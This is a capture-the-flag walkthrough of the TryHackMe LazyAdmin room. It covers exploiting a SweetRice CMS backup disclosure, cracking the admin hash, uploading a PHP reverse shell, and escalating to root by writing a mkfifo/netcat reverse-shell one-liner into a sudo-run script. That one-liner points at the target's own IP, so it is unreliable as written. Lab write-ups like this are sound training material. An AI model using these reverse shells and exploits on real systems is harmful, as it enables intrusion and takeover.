Overview

This walkthrough demonstrates how I exploited the LazyAdmin room on TryHackMe. Each section includes detailed explanations of the enumeration, exploitation, and privilege escalation processes.


🎯 Privilege Escalation Summary:

  • Vector: Misconfigured sudo permissions on a Perl script (backup.pl)
  • Exploitation Technique: Abuse of a vulnerable shell script (/etc/copy.sh) to execute a reverse shell
  • Result: Full root access via a reverse shell connection

πŸ•΅οΈ Initial Enumeration

I began by performing a full port scan to identify open services:

nmap -p- -T4 -A 10.10.95.27

The results revealed two open ports:

  • Port 22: SSH
  • Port 80: HTTP (Apache)

Navigating to http://10.10.95.27 on port 80 returned the default Apache2 Ubuntu page:

Default Apache2 Ubuntu Page


🌐 Web Enumeration

Checking robots.txt

I checked the robots.txt file at http://10.10.95.27/robots.txt, which returned β€œNot Found.” However, I was able to gather the Apache version Apache/2.4.18, which could be useful for identifying potential exploits.

robots.txt Not Found

Directory Busting with FFuF

I then performed directory enumeration using FFuF:

ffuf -w /usr/share/wordlists/dirb/common.txt -u 'http://10.10.95.27/FUZZ'

This revealed an interesting directory named /content.

FFuF Results Revealing Content Directory

To validate my results, I ran another directory search using dirsearch:

Dirsearch Results


πŸ“š Vulnerability Research

After identifying the CMS as SweetRice 1.5.1, I searched for public exploits. I discovered two interesting vulnerabilities:

1. Backup Disclosure (Exploit-DB 40718)

https://www.exploit-db.com/exploits/40718

This exploit allows attackers to access sensitive MySQL backups stored in an unprotected directory.

Proof of Concept (PoC):

You can access all MySQL backups and download them from this directory:
http://localhost/inc/mysql_backup

You can also access website file backups from:
http://localhost/SweetRice-transfer.zip

Exploit-DB Backup Disclosure PoC

2. Arbitrary File Upload (Exploit-DB 40716)

https://www.exploit-db.com/exploits/40716

This exploit highlights a file upload vulnerability that allows attackers to upload malicious files and gain code execution.

# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016

import requests
from requests import session

# Exploit attempts to upload a file via /as directory
login = r.post('http://' + host + '/as/?type=signin', data=payload)

# Targeted upload endpoint and accepted formats (.php5 included)
uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)

The code showed that we needed to target the /as directory for the portal login and that .php5 was an accepted file format for uploading malicious payloads.


πŸ“‚ SweetRice Backup Disclosure Exploit

Following the Backup Disclosure PoC, I navigated to the following directory:

http://10.10.95.27/content/inc/mysql_backup/

This exposed a MySQL backup file which I downloaded and examined.

Accessing MySQL Backup Directory


πŸ”Ž Extracting Credentials

I analyzed the backup file and discovered a hashed password.

Description\";s:5:\"admin\";s:7:\"manager\";s:6:\"passwd\";s:32:\"42f749ade7f9e195bf475f37a44cafcb

I used CrackStation to crack the hash and obtained the password:

Password: Password123

Cracking Password Hash with CrackStation


πŸ” CMS Login & Shell Upload

With valid credentials (manager:Password123), I logged into the CMS via:

http://10.10.95.27/content/as/

SweetRice CMS Login Page


🎯 Uploading a Reverse Shell

After logging in, I navigated to the Media Center where I had the ability to upload files.

Media Center Upload Page

I prepared a PHP reverse shell from PentestMonkey and modified it with my Kali IP and port:

https://github.com/pentestmonkey/php-reverse-shell

nano shell.php5

Modifying PHP Reverse Shell Payload

Started a listener on port 7777:

nc -lvnp 7777

Netcat Listener Waiting on Port 7777

Uploaded and triggered the payload:

Uploading Reverse Shell to Media Center Triggering Reverse Shell Payload


🐚 Gaining Foothold

I received a shell as www-data and began local enumeration:

whoami
id
sudo -l

Initial Enumeration as www-data


πŸ—οΈ Privilege Escalation via Misconfigured sudo Permissions

Reviewing Backup Script (backup.pl)

I discovered that I had sudo permissions to run backup.pl as root.

cat /home/itguy/backup.pl

Contents of backup.pl Script

The script referenced /etc/copy.sh, which contained a reverse shell.

cat /etc/copy.sh

Contents of copy.sh


πŸš€ Overwriting copy.sh to Gain Root

I overwrote copy.sh with a reverse shell payload:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.95.27 5554 > /tmp/f" > /etc/copy.sh

Overwriting copy.sh with Reverse Shell


πŸ“‘ Catching the Root Shell

Set up a new listener on port 5554:

nc -lvnp 5554

Listener for Root Shell

Triggered the reverse shell as root:

Root Shell Obtained


πŸŽ‰ Conclusion

LazyAdmin was an exciting machine that demonstrated various critical exploitation techniques:

  • Discovered a MySQL backup disclosure vulnerability
  • Cracked admin credentials to gain access to the CMS
  • Uploaded and triggered a PHP reverse shell
  • Gained root through misconfigured sudo permissions on a backup script

Happy hacking! πŸ§ πŸ’»πŸ”₯

Try the LazyAdmin room on TryHackMe